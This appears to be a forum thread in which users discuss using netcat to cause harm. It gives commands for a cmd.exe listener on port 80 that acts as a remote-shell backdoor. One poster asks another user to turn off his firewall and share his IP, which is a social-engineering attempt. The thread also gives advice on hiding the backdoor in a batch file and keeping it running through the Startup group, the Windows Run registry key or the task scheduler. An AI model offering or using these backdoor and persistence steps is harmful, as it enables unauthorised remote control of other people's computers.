just wondering if anyone knows how to do any harm in this little program
Cause harm? Why would you want to do that? Is your brains in your ass? Just for the record, I know how to run and use netcat very well. I love this little application
I run and use it for my windows xp pro. It's good for creating back doors (systems you already breached) and (bypassing packet filtering programs).
You can use the following syntax;
nc -v -w 2 -z IP_Address port_range/port_number
nc -v -n IP_Address port
nc -l -p 80 -t -e cmd.exe
Turn off your firewall
Tell me your IP
The following command above by dj-chris simply opens a netcat listener on port 80 , runs it in the background so a user will not see it on the console, and then executes cmd.exe aka the (command prompt). If he was to connect to the system on port 80 he would have 'obtain' a command prompt.
Let me guess you're telling him to open netcat (nc) and have it -l (listen) on -p (port 80) the -e switch is for (inbound program to execute) in this case it would be the command prompt aka cmd.exe
Even if he did turn off his firewall and gave you his WAN IP address you still wouldnt be able to get this to work.
However, if used FPIPE with NETCAT then this theory would work. Quite well actually.
If I was you DJ-CHRIS I would just create a batch file and use nc -l -p 80 myipaddress -d -e cmd.exe. To get the batch file to execute you can always copy it into the startup group and set it to run on the reg key HKLM\CCS\SOFTWARE\MICROSOFT\WINDOWS\RUN or you can always use the scheduled service either way works.
As far as port redirection use FPIPE. FPIPE with Netcat can do some pretty neat things. Just my two cents.[/QUOTE]